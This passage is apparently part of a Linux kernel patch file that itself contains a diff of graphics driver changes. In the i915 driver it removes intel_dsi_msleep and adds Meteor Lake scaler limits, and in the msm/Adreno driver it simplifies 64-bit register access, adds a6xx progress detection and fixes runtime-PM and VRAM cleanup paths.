+-	if (is_vid_mode(intel_dsi) && connector->panel.vbt.dsi.seq_version >= 3)
+-		return;
+-
+-	msleep(msec);
+-}
+-
+ void intel_dsi_log_params(struct intel_dsi *intel_dsi)
+ {
+ 	struct drm_i915_private *i915 = to_i915(intel_dsi->base.base.dev);
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.h b/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
+index dc642c1fe7efd..468d873fab1ae 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
+@@ -16,7 +16,6 @@ void intel_dsi_vbt_gpio_init(struct intel_dsi *intel_dsi, bool panel_is_on);
+ void intel_dsi_vbt_gpio_cleanup(struct intel_dsi *intel_dsi);
+ void intel_dsi_vbt_exec_sequence(struct intel_dsi *intel_dsi,
+ 				 enum mipi_seq seq_id);
+-void intel_dsi_msleep(struct intel_dsi *intel_dsi, int msec);
+ void intel_dsi_log_params(struct intel_dsi *intel_dsi);
+ 
+ #endif /* __INTEL_DSI_VBT_H__ */
+diff --git a/drivers/gpu/drm/i915/display/skl_scaler.c b/drivers/gpu/drm/i915/display/skl_scaler.c
+index 4092679be21ec..90f42f63128ec 100644
+--- a/drivers/gpu/drm/i915/display/skl_scaler.c
++++ b/drivers/gpu/drm/i915/display/skl_scaler.c
+@@ -85,6 +85,10 @@ static u16 skl_scaler_calc_phase(int sub, int scale, bool chroma_cosited)
+ #define ICL_MAX_SRC_H 4096
+ #define ICL_MAX_DST_W 5120
+ #define ICL_MAX_DST_H 4096
++#define MTL_MAX_SRC_W 4096
++#define MTL_MAX_SRC_H 8192
++#define MTL_MAX_DST_W 8192
++#define MTL_MAX_DST_H 8192
+ #define SKL_MIN_YUV_420_SRC_W 16
+ #define SKL_MIN_YUV_420_SRC_H 16
+ 
+@@ -101,6 +105,10 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 	struct drm_i915_private *dev_priv = to_i915(crtc->base.dev);
+ 	const struct drm_display_mode *adjusted_mode =
+ 		&crtc_state->hw.adjusted_mode;
++	int pipe_src_w = drm_rect_width(&crtc_state->pipe_src);
++	int pipe_src_h = drm_rect_height(&crtc_state->pipe_src);
++	int min_src_w, min_src_h, min_dst_w, min_dst_h;
++	int max_src_w, max_src_h, max_dst_w, max_dst_h;
+ 
+ 	/*
+ 	 * Src coordinates are already rotated by 270 degrees for
+@@ -155,15 +163,33 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 		return -EINVAL;
+ 	}
+ 
++	min_src_w = SKL_MIN_SRC_W;
++	min_src_h = SKL_MIN_SRC_H;
++	min_dst_w = SKL_MIN_DST_W;
++	min_dst_h = SKL_MIN_DST_H;
++
++	if (DISPLAY_VER(dev_priv) < 11) {
++		max_src_w = SKL_MAX_SRC_W;
++		max_src_h = SKL_MAX_SRC_H;
++		max_dst_w = SKL_MAX_DST_W;
++		max_dst_h = SKL_MAX_DST_H;
++	} else if (DISPLAY_VER(dev_priv) < 14) {
++		max_src_w = ICL_MAX_SRC_W;
++		max_src_h = ICL_MAX_SRC_H;
++		max_dst_w = ICL_MAX_DST_W;
++		max_dst_h = ICL_MAX_DST_H;
++	} else {
++		max_src_w = MTL_MAX_SRC_W;
++		max_src_h = MTL_MAX_SRC_H;
++		max_dst_w = MTL_MAX_DST_W;
++		max_dst_h = MTL_MAX_DST_H;
++	}
++
+ 	/* range checks */
+-	if (src_w < SKL_MIN_SRC_W || src_h < SKL_MIN_SRC_H ||
+-	    dst_w < SKL_MIN_DST_W || dst_h < SKL_MIN_DST_H ||
+-	    (DISPLAY_VER(dev_priv) >= 11 &&
+-	     (src_w > ICL_MAX_SRC_W || src_h > ICL_MAX_SRC_H ||
+-	      dst_w > ICL_MAX_DST_W || dst_h > ICL_MAX_DST_H)) ||
+-	    (DISPLAY_VER(dev_priv) < 11 &&
+-	     (src_w > SKL_MAX_SRC_W || src_h > SKL_MAX_SRC_H ||
+-	      dst_w > SKL_MAX_DST_W || dst_h > SKL_MAX_DST_H)))	{
++	if (src_w < min_src_w || src_h < min_src_h ||
++	    dst_w < min_dst_w || dst_h < min_dst_h ||
++	    src_w > max_src_w || src_h > max_src_h ||
++	    dst_w > max_dst_w || dst_h > max_dst_h) {
+ 		drm_dbg_kms(&dev_priv->drm,
+ 			    "scaler_user index %u.%u: src %ux%u dst %ux%u "
+ 			    "size is out of scaler range\n",
+@@ -172,6 +198,21 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * The pipe scaler does not use all the bits of PIPESRC, at least
++	 * on the earlier platforms. So even when we're scaling a plane
++	 * the *pipe* source size must not be too large. For simplicity
++	 * we assume the limits match the scaler source size limits. Might
++	 * not be 100% accurate on all platforms, but good enough for now.
++	 */
++	if (pipe_src_w > max_src_w || pipe_src_h > max_src_h) {
++		drm_dbg_kms(&dev_priv->drm,
++			    "scaler_user index %u.%u: pipe src size %ux%u "
++			    "is out of scaler range\n",
++			    crtc->pipe, scaler_user, pipe_src_w, pipe_src_h);
++		return -EINVAL;
++	}
++
+ 	/* mark this plane as a scaler user in crtc_state */
+ 	scaler_state->scaler_users |= (1 << scaler_user);
+ 	drm_dbg_kms(&dev_priv->drm, "scaler_user index %u.%u: "
+diff --git a/drivers/gpu/drm/i915/display/vlv_dsi.c b/drivers/gpu/drm/i915/display/vlv_dsi.c
+index 90e3e41095b34..00c80f29ad999 100644
+--- a/drivers/gpu/drm/i915/display/vlv_dsi.c
++++ b/drivers/gpu/drm/i915/display/vlv_dsi.c
+@@ -782,7 +782,6 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ {
+ 	struct intel_dsi *intel_dsi = enc_to_intel_dsi(encoder);
+ 	struct intel_crtc *crtc = to_intel_crtc(pipe_config->uapi.crtc);
+-	struct intel_connector *connector = to_intel_connector(conn_state->connector);
+ 	struct drm_i915_private *dev_priv = to_i915(crtc->base.dev);
+ 	enum pipe pipe = crtc->pipe;
+ 	enum port port;
+@@ -830,21 +829,10 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ 	if (!IS_GEMINILAKE(dev_priv))
+ 		intel_dsi_prepare(encoder, pipe_config);
+ 
++	/* Give the panel time to power-on and then deassert its reset */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_ON);
+-
+-	/*
+-	 * Give the panel time to power-on and then deassert its reset.
+-	 * Depending on the VBT MIPI sequences version the deassert-seq
+-	 * may contain the necessary delay, intel_dsi_msleep() will skip
+-	 * the delay in that case. If there is no deassert-seq, then an
+-	 * unconditional msleep is used to give the panel time to power-on.
+-	 */
+-	if (connector->panel.vbt.dsi.sequence[MIPI_SEQ_DEASSERT_RESET]) {
+-		intel_dsi_msleep(intel_dsi, intel_dsi->panel_on_delay);
+-		intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+-	} else {
+-		msleep(intel_dsi->panel_on_delay);
+-	}
++	msleep(intel_dsi->panel_on_delay);
++	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+ 
+ 	if (IS_GEMINILAKE(dev_priv)) {
+ 		glk_cold_boot = glk_dsi_enable_io(encoder);
+@@ -878,7 +866,7 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ 		msleep(20); /* XXX */
+ 		for_each_dsi_port(port, intel_dsi->ports)
+ 			dpi_send_cmd(intel_dsi, TURN_ON, false, port);
+-		intel_dsi_msleep(intel_dsi, 100);
++		msleep(100);
+ 
+ 		intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DISPLAY_ON);
+ 
+@@ -1006,7 +994,7 @@ static void intel_dsi_post_disable(struct intel_atomic_state *state,
+ 	/* Assert reset */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_ASSERT_RESET);
+ 
+-	intel_dsi_msleep(intel_dsi, intel_dsi->panel_off_delay);
++	msleep(intel_dsi->panel_off_delay);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_OFF);
+ 
+ 	intel_dsi->panel_power_off_time = ktime_get_boottime();
+diff --git a/drivers/gpu/drm/i915/i915_pci.c b/drivers/gpu/drm/i915/i915_pci.c
+index fe4f279aaeb3e..a2efc0b9d50c8 100644
+--- a/drivers/gpu/drm/i915/i915_pci.c
++++ b/drivers/gpu/drm/i915/i915_pci.c
+@@ -1133,6 +1133,8 @@ static const struct intel_gt_definition xelpmp_extra_gt[] = {
+ static const struct intel_device_info mtl_info = {
+ 	XE_HP_FEATURES,
+ 	XE_LPDP_FEATURES,
++	.__runtime.cpu_transcoder_mask = BIT(TRANSCODER_A) | BIT(TRANSCODER_B) |
++			       BIT(TRANSCODER_C) | BIT(TRANSCODER_D),
+ 	/*
+ 	 * Real graphics IP version will be obtained from hardware GMD_ID
+ 	 * register.  Value provided here is just for sanity checking.
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index 2372bfa04aa87..25015996f627a 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -7840,8 +7840,8 @@ enum skl_power_gate {
+ 
+ #define _PLANE_CSC_RY_GY_1(pipe)	_PIPE(pipe, _PLANE_CSC_RY_GY_1_A, \
+ 					      _PLANE_CSC_RY_GY_1_B)
+-#define _PLANE_CSC_RY_GY_2(pipe)	_PIPE(pipe, _PLANE_INPUT_CSC_RY_GY_2_A, \
+-					      _PLANE_INPUT_CSC_RY_GY_2_B)
++#define _PLANE_CSC_RY_GY_2(pipe)	_PIPE(pipe, _PLANE_CSC_RY_GY_2_A, \
++					      _PLANE_CSC_RY_GY_2_B)
+ #define PLANE_CSC_COEFF(pipe, plane, index)	_MMIO_PLANE(plane, \
+ 							    _PLANE_CSC_RY_GY_1(pipe) +  (index) * 4, \
+ 							    _PLANE_CSC_RY_GY_2(pipe) + (index) * 4)
+diff --git a/drivers/gpu/drm/msm/adreno/a4xx_gpu.c b/drivers/gpu/drm/msm/adreno/a4xx_gpu.c
+index 7cb8d9849c073..a10feb8a4194a 100644
+--- a/drivers/gpu/drm/msm/adreno/a4xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a4xx_gpu.c
+@@ -606,8 +606,7 @@ static int a4xx_pm_suspend(struct msm_gpu *gpu) {
+ 
+ static int a4xx_get_timestamp(struct msm_gpu *gpu, uint64_t *value)
+ {
+-	*value = gpu_read64(gpu, REG_A4XX_RBBM_PERFCTR_CP_0_LO,
+-		REG_A4XX_RBBM_PERFCTR_CP_0_HI);
++	*value = gpu_read64(gpu, REG_A4XX_RBBM_PERFCTR_CP_0_LO);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 02ff306f96f42..24feae285ccd6 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -605,11 +605,9 @@ static int a5xx_ucode_init(struct msm_gpu *gpu)
+ 		a5xx_ucode_check_version(a5xx_gpu, a5xx_gpu->pfp_bo);
+ 	}
+ 
+-	gpu_write64(gpu, REG_A5XX_CP_ME_INSTR_BASE_LO,
+-		REG_A5XX_CP_ME_INSTR_BASE_HI, a5xx_gpu->pm4_iova);
++	gpu_write64(gpu, REG_A5XX_CP_ME_INSTR_BASE_LO, a5xx_gpu->pm4_iova);
+ 
+-	gpu_write64(gpu, REG_A5XX_CP_PFP_INSTR_BASE_LO,
+-		REG_A5XX_CP_PFP_INSTR_BASE_HI, a5xx_gpu->pfp_iova);
++	gpu_write64(gpu, REG_A5XX_CP_PFP_INSTR_BASE_LO, a5xx_gpu->pfp_iova);
+ 
+ 	return 0;
+ }
+@@ -868,8 +866,7 @@ static int a5xx_hw_init(struct msm_gpu *gpu)
+ 	 * memory rendering at this point in time and we don't want to block off
+ 	 * part of the virtual memory space.
+ 	 */
+-	gpu_write64(gpu, REG_A5XX_RBBM_SECVID_TSB_TRUSTED_BASE_LO,
+-		REG_A5XX_RBBM_SECVID_TSB_TRUSTED_BASE_HI, 0x00000000);
++	gpu_write64(gpu, REG_A5XX_RBBM_SECVID_TSB_TRUSTED_BASE_LO, 0x00000000);
+ 	gpu_write(gpu, REG_A5XX_RBBM_SECVID_TSB_TRUSTED_SIZE, 0x00000000);
+ 
+ 	/* Put the GPU into 64 bit by default */
+@@ -908,8 +905,7 @@ static int a5xx_hw_init(struct msm_gpu *gpu)
+ 		return ret;
+ 
+ 	/* Set the ringbuffer address */
+-	gpu_write64(gpu, REG_A5XX_CP_RB_BASE, REG_A5XX_CP_RB_BASE_HI,
+-		gpu->rb[0]->iova);
++	gpu_write64(gpu, REG_A5XX_CP_RB_BASE, gpu->rb[0]->iova);
+ 
+ 	/*
+ 	 * If the microcode supports the WHERE_AM_I opcode then we can use that
+@@ -936,7 +932,7 @@ static int a5xx_hw_init(struct msm_gpu *gpu)
+ 		}
+ 
+ 		gpu_write64(gpu, REG_A5XX_CP_RB_RPTR_ADDR,
+-			REG_A5XX_CP_RB_RPTR_ADDR_HI, shadowptr(a5xx_gpu, gpu->rb[0]));
++			    shadowptr(a5xx_gpu, gpu->rb[0]));
+ 	} else if (gpu->nr_rings > 1) {
+ 		/* Disable preemption if WHERE_AM_I isn't available */
+ 		a5xx_preempt_fini(gpu);
+@@ -1239,9 +1235,9 @@ static void a5xx_fault_detect_irq(struct msm_gpu *gpu)
+ 		gpu_read(gpu, REG_A5XX_RBBM_STATUS),
+ 		gpu_read(gpu, REG_A5XX_CP_RB_RPTR),
+ 		gpu_read(gpu, REG_A5XX_CP_RB_WPTR),
+-		gpu_read64(gpu, REG_A5XX_CP_IB1_BASE, REG_A5XX_CP_IB1_BASE_HI),
++		gpu_read64(gpu, REG_A5XX_CP_IB1_BASE),
+ 		gpu_read(gpu, REG_A5XX_CP_IB1_BUFSZ),
+-		gpu_read64(gpu, REG_A5XX_CP_IB2_BASE, REG_A5XX_CP_IB2_BASE_HI),
++		gpu_read64(gpu, REG_A5XX_CP_IB2_BASE),
+ 		gpu_read(gpu, REG_A5XX_CP_IB2_BUFSZ));
+ 
+ 	/* Turn off the hangcheck timer to keep it from bothering us */
+@@ -1427,8 +1423,7 @@ static int a5xx_pm_suspend(struct msm_gpu *gpu)
+ 
+ static int a5xx_get_timestamp(struct msm_gpu *gpu, uint64_t *value)
+ {
+-	*value = gpu_read64(gpu, REG_A5XX_RBBM_ALWAYSON_COUNTER_LO,
+-		REG_A5XX_RBBM_ALWAYSON_COUNTER_HI);
++	*value = gpu_read64(gpu, REG_A5XX_RBBM_ALWAYSON_COUNTER_LO);
+ 
+ 	return 0;
+ }
+@@ -1465,8 +1460,7 @@ static int a5xx_crashdumper_run(struct msm_gpu *gpu,
+ 	if (IS_ERR_OR_NULL(dumper->ptr))
+ 		return -EINVAL;
+ 
+-	gpu_write64(gpu, REG_A5XX_CP_CRASH_SCRIPT_BASE_LO,
+-		REG_A5XX_CP_CRASH_SCRIPT_BASE_HI, dumper->iova);
++	gpu_write64(gpu, REG_A5XX_CP_CRASH_SCRIPT_BASE_LO, dumper->iova);
+ 
+ 	gpu_write(gpu, REG_A5XX_CP_CRASH_DUMP_CNTL, 1);
+ 
+@@ -1666,8 +1660,7 @@ static u64 a5xx_gpu_busy(struct msm_gpu *gpu, unsigned long *out_sample_rate)
+ {
+ 	u64 busy_cycles;
+ 
+-	busy_cycles = gpu_read64(gpu, REG_A5XX_RBBM_PERFCTR_RBBM_0_LO,
+-			REG_A5XX_RBBM_PERFCTR_RBBM_0_HI);
++	busy_cycles = gpu_read64(gpu, REG_A5XX_RBBM_PERFCTR_RBBM_0_LO);
+ 	*out_sample_rate = clk_get_rate(gpu->core_clk);
+ 
+ 	return busy_cycles;
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+index e0eef47dae632..f58dd564d122b 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+@@ -137,7 +137,6 @@ void a5xx_preempt_trigger(struct msm_gpu *gpu)
+ 
+ 	/* Set the address of the incoming preemption record */
+ 	gpu_write64(gpu, REG_A5XX_CP_CONTEXT_SWITCH_RESTORE_ADDR_LO,
+-		REG_A5XX_CP_CONTEXT_SWITCH_RESTORE_ADDR_HI,
+ 		a5xx_gpu->preempt_iova[ring->id]);
+ 
+ 	a5xx_gpu->next_ring = ring;
+@@ -212,8 +211,7 @@ void a5xx_preempt_hw_init(struct msm_gpu *gpu)
+ 	}
+ 
+ 	/* Write a 0 to signal that we aren't switching pagetables */
+-	gpu_write64(gpu, REG_A5XX_CP_CONTEXT_SWITCH_SMMU_INFO_LO,
+-		REG_A5XX_CP_CONTEXT_SWITCH_SMMU_INFO_HI, 0);
++	gpu_write64(gpu, REG_A5XX_CP_CONTEXT_SWITCH_SMMU_INFO_LO, 0);
+ 
+ 	/* Reset the preemption state */
+ 	set_preempt_state(a5xx_gpu, PREEMPT_NONE);
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+index 9d7fc44c1e2a9..95e73eddc5e91 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+@@ -247,8 +247,7 @@ static void a6xx_submit(struct msm_gpu *gpu, struct msm_gem_submit *submit)
+ 	OUT_RING(ring, submit->seqno);
+ 
+ 	trace_msm_gpu_submit_flush(submit,
+-		gpu_read64(gpu, REG_A6XX_CP_ALWAYS_ON_COUNTER_LO,
+-			REG_A6XX_CP_ALWAYS_ON_COUNTER_HI));
++		gpu_read64(gpu, REG_A6XX_CP_ALWAYS_ON_COUNTER_LO));
+ 
+ 	a6xx_flush(gpu, ring);
+ }
+@@ -947,8 +946,7 @@ static int a6xx_ucode_init(struct msm_gpu *gpu)
+ 		}
+ 	}
+ 
+-	gpu_write64(gpu, REG_A6XX_CP_SQE_INSTR_BASE,
+-		REG_A6XX_CP_SQE_INSTR_BASE+1, a6xx_gpu->sqe_iova);
++	gpu_write64(gpu, REG_A6XX_CP_SQE_INSTR_BASE, a6xx_gpu->sqe_iova);
+ 
+ 	return 0;
+ }
+@@ -999,8 +997,7 @@ static int hw_init(struct msm_gpu *gpu)
+ 	 * memory rendering at this point in time and we don't want to block off
+ 	 * part of the virtual memory space.
+ 	 */
+-	gpu_write64(gpu, REG_A6XX_RBBM_SECVID_TSB_TRUSTED_BASE_LO,
+-		REG_A6XX_RBBM_SECVID_TSB_TRUSTED_BASE_HI, 0x00000000);
++	gpu_write64(gpu, REG_A6XX_RBBM_SECVID_TSB_TRUSTED_BASE_LO, 0x00000000);
+ 	gpu_write(gpu, REG_A6XX_RBBM_SECVID_TSB_TRUSTED_SIZE, 0x00000000);
+ 
+ 	/* Turn on 64 bit addressing for all blocks */
+@@ -1049,11 +1046,9 @@ static int hw_init(struct msm_gpu *gpu)
+ 
+ 	if (!adreno_is_a650_family(adreno_gpu)) {
+ 		/* Set the GMEM VA range [0x100000:0x100000 + gpu->gmem - 1] */
+-		gpu_write64(gpu, REG_A6XX_UCHE_GMEM_RANGE_MIN_LO,
+-			REG_A6XX_UCHE_GMEM_RANGE_MIN_HI, 0x00100000);
++		gpu_write64(gpu, REG_A6XX_UCHE_GMEM_RANGE_MIN_LO, 0x00100000);
+ 
+ 		gpu_write64(gpu, REG_A6XX_UCHE_GMEM_RANGE_MAX_LO,
+-			REG_A6XX_UCHE_GMEM_RANGE_MAX_HI,
+ 			0x00100000 + adreno_gpu->gmem - 1);
+ 	}
+ 
+@@ -1145,8 +1140,7 @@ static int hw_init(struct msm_gpu *gpu)
+ 		goto out;
+ 
+ 	/* Set the ringbuffer address */
+-	gpu_write64(gpu, REG_A6XX_CP_RB_BASE, REG_A6XX_CP_RB_BASE_HI,
+-		gpu->rb[0]->iova);
++	gpu_write64(gpu, REG_A6XX_CP_RB_BASE, gpu->rb[0]->iova);
+ 
+ 	/* Targets that support extended APRIV can use the RPTR shadow from
+ 	 * hardware but all the other ones need to disable the feature. Targets
+@@ -1178,7 +1172,6 @@ static int hw_init(struct msm_gpu *gpu)
+ 		}
+ 
+ 		gpu_write64(gpu, REG_A6XX_CP_RB_RPTR_ADDR_LO,
+-			REG_A6XX_CP_RB_RPTR_ADDR_HI,
+ 			shadowptr(a6xx_gpu, gpu->rb[0]));
+ 	}
+ 
+@@ -1506,9 +1499,9 @@ static void a6xx_fault_detect_irq(struct msm_gpu *gpu)
+ 		gpu_read(gpu, REG_A6XX_RBBM_STATUS),
+ 		gpu_read(gpu, REG_A6XX_CP_RB_RPTR),
+ 		gpu_read(gpu, REG_A6XX_CP_RB_WPTR),
+-		gpu_read64(gpu, REG_A6XX_CP_IB1_BASE, REG_A6XX_CP_IB1_BASE_HI),
++		gpu_read64(gpu, REG_A6XX_CP_IB1_BASE),
+ 		gpu_read(gpu, REG_A6XX_CP_IB1_REM_SIZE),
+-		gpu_read64(gpu, REG_A6XX_CP_IB2_BASE, REG_A6XX_CP_IB2_BASE_HI),
++		gpu_read64(gpu, REG_A6XX_CP_IB2_BASE),
+ 		gpu_read(gpu, REG_A6XX_CP_IB2_REM_SIZE));
+ 
+ 	/* Turn off the hangcheck timer to keep it from bothering us */
+@@ -1719,8 +1712,7 @@ static int a6xx_get_timestamp(struct msm_gpu *gpu, uint64_t *value)
+ 	/* Force the GPU power on so we can read this register */
+ 	a6xx_gmu_set_oob(&a6xx_gpu->gmu, GMU_OOB_PERFCOUNTER_SET);
+ 
+-	*value = gpu_read64(gpu, REG_A6XX_CP_ALWAYS_ON_COUNTER_LO,
+-			    REG_A6XX_CP_ALWAYS_ON_COUNTER_HI);
++	*value = gpu_read64(gpu, REG_A6XX_CP_ALWAYS_ON_COUNTER_LO);
+ 
+ 	a6xx_gmu_clear_oob(&a6xx_gpu->gmu, GMU_OOB_PERFCOUNTER_SET);
+ 
+@@ -1858,6 +1850,39 @@ static uint32_t a6xx_get_rptr(struct msm_gpu *gpu, struct msm_ringbuffer *ring)
+ 	return ring->memptrs->rptr = gpu_read(gpu, REG_A6XX_CP_RB_RPTR);
+ }
+ 
++static bool a6xx_progress(struct msm_gpu *gpu, struct msm_ringbuffer *ring)
++{
++	struct msm_cp_state cp_state = {
++		.ib1_base = gpu_read64(gpu, REG_A6XX_CP_IB1_BASE),
++		.ib2_base = gpu_read64(gpu, REG_A6XX_CP_IB2_BASE),
++		.ib1_rem  = gpu_read(gpu, REG_A6XX_CP_IB1_REM_SIZE),
++		.ib2_rem  = gpu_read(gpu, REG_A6XX_CP_IB2_REM_SIZE),
++	};
++	bool progress;
++
++	/*
++	 * Adjust the remaining data to account for what has already been
++	 * fetched from memory, but not yet consumed by the SQE.
++	 *
++	 * This is not *technically* correct, the amount buffered could
++	 * exceed the IB size due to hw prefetching ahead, but:
++	 *
++	 * (1) We aren't trying to find the exact position, just whether
++	 *     progress has been made
++	 * (2) The CP_REG_TO_MEM at the end of a submit should be enough
++	 *     to prevent prefetching into an unrelated submit.  (And
++	 *     either way, at some point the ROQ will be full.)
++	 */
++	cp_state.ib1_rem += gpu_read(gpu, REG_A6XX_CP_CSQ_IB1_STAT) >> 16;
++	cp_state.ib2_rem += gpu_read(gpu, REG_A6XX_CP_CSQ_IB2_STAT) >> 16;
++
++	progress = !!memcmp(&cp_state, &ring->last_cp_state, sizeof(cp_state));
++
++	ring->last_cp_state = cp_state;
++
++	return progress;
++}
++
+ static u32 a618_get_speed_bin(u32 fuse)
+ {
+ 	if (fuse == 0)
+@@ -1974,6 +1999,7 @@ static const struct adreno_gpu_funcs funcs = {
+ 		.create_address_space = a6xx_create_address_space,
+ 		.create_private_address_space = a6xx_create_private_address_space,
+ 		.get_rptr = a6xx_get_rptr,
++		.progress = a6xx_progress,
+ 	},
+ 	.get_timestamp = a6xx_get_timestamp,
+ };
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.c b/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.c
+index a5c3d1ed255a6..a023d5f962dce 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu_state.c
+@@ -147,8 +147,7 @@ static int a6xx_crashdumper_run(struct msm_gpu *gpu,
+ 	/* Make sure all pending memory writes are posted */
+ 	wmb();
+ 
+-	gpu_write64(gpu, REG_A6XX_CP_CRASH_SCRIPT_BASE_LO,
+-		REG_A6XX_CP_CRASH_SCRIPT_BASE_HI, dumper->iova);
++	gpu_write64(gpu, REG_A6XX_CP_CRASH_SCRIPT_BASE_LO, dumper->iova);
+ 
+ 	gpu_write(gpu, REG_A6XX_CP_CRASH_DUMP_CNTL, 1);
+ 
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index cd009d56d35d5..ed1e0c650bb1a 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -440,20 +440,21 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ 
+ 	ret = pm_runtime_get_sync(&pdev->dev);
+ 	if (ret < 0) {
+-		pm_runtime_put_sync(&pdev->dev);
++		pm_runtime_put_noidle(&pdev->dev);
+ 		DRM_DEV_ERROR(dev->dev, "Couldn't power up the GPU: %d\n", ret);
+-		return NULL;
++		goto err_disable_rpm;
+ 	}
+ 
+ 	mutex_lock(&gpu->lock);
+ 	ret = msm_gpu_hw_init(gpu);
+ 	mutex_unlock(&gpu->lock);
+-	pm_runtime_put_autosuspend(&pdev->dev);
+ 	if (ret) {
+ 		DRM_DEV_ERROR(dev->dev, "gpu hw init failed: %d\n", ret);
+-		return NULL;
++		goto err_put_rpm;
+ 	}
+ 
++	pm_runtime_put_autosuspend(&pdev->dev);
++
+ #ifdef CONFIG_DEBUG_FS
+ 	if (gpu->funcs->debugfs_init) {
+ 		gpu->funcs->debugfs_init(gpu, dev->primary);
+@@ -462,6 +463,13 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ #endif
+ 
+ 	return gpu;
++
++err_put_rpm:
++	pm_runtime_put_sync_suspend(&pdev->dev);
++err_disable_rpm:
++	pm_runtime_disable(&pdev->dev);
++
++	return NULL;
+ }
+ 
+ static int find_chipid(struct device *dev, struct adreno_rev *rev)
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index 5a0ff112634b7..ac3d1d492a48c 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -50,6 +50,8 @@
+ #define MSM_VERSION_MINOR	9
+ #define MSM_VERSION_PATCHLEVEL	0
+ 
++static void msm_deinit_vram(struct drm_device *ddev);
++
+ static const struct drm_mode_config_funcs mode_config_funcs = {
+ 	.fb_create = msm_framebuffer_create,
+ 	.output_poll_changed = drm_fb_helper_output_poll_changed,
+@@ -241,7 +243,8 @@ static int msm_drm_uninit(struct device *dev)
+ 		msm_fbdev_free(ddev);
+ #endif
+ 
+-	msm_disp_snapshot_destroy(ddev);
++	if (kms)
++		msm_disp_snapshot_destroy(ddev);
+ 
+ 	drm_mode_config_cleanup(ddev);
+ 
+@@ -249,19 +252,16 @@ static int msm_drm_uninit(struct device *dev)
+ 		drm_bridge_remove(priv->bridges[i]);
+ 	priv->num_bridges = 0;
+ 
+-	pm_runtime_get_sync(dev);
+-	msm_irq_uninstall(ddev);
+-	pm_runtime_put_sync(dev);
++	if (kms) {
++		pm_runtime_get_sync(dev);
++		msm_irq_uninstall(ddev);
++		pm_runtime_put_sync(dev);
++	}
+ 
+ 	if (kms && kms->funcs)
+ 		kms->funcs->destroy(kms);
+ 
+-	if (priv->vram.paddr) {
+-		unsigned long attrs = DMA_ATTR_NO_KERNEL_MAPPING;
+-		drm_mm_takedown(&priv->vram.mm);
+-		dma_free_attrs(dev, priv->vram.size, NULL,
+-			       priv->vram.paddr, attrs);
+-	}
++	msm_deinit_vram(ddev);
+ 
+ 	component_unbind_all(dev, ddev);
+ 
+@@ -401,6 +401,19 @@ static int msm_init_vram(struct drm_device *dev)
+ 	return ret;
+ }
+ 
++static void msm_deinit_vram(struct drm_device *ddev)
++{
++	struct msm_drm_private *priv = ddev->dev_private;
++	unsigned long attrs = DMA_ATTR_NO_KERNEL_MAPPING;
++
++	if (!priv->vram.paddr)
++		return;
++
++	drm_mm_takedown(&priv->vram.mm);
++	dma_free_attrs(ddev->dev, priv->vram.size, NULL, priv->vram.paddr,
++			attrs);
++}
++
+ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ {
+ 	struct msm_drm_private *priv = dev_get_drvdata(dev);
+@@ -420,7 +433,10 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 	priv->dev = ddev;
+ 
+ 	priv->wq = alloc_ordered_workqueue("msm", 0);
+-	priv->hangcheck_period = DRM_MSM_HANGCHECK_DEFAULT_PERIOD;
++	if (!priv->wq) {
++		ret = -ENOMEM;
++		goto err_put_dev;
++	}
+ 
+ 	INIT_LIST_HEAD(&priv->objects);
+ 	mutex_init(&priv->obj_lock);
